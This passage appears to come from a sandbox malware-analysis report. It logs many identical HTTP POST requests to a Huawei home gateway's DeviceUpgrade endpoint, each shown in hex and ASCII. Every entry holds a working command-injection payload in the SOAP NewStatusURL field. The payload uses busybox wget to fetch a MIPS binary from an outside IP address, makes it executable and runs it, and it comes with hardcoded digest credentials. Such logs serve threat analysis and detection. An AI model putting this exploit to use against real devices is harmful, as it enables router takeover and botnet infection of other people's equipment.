2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 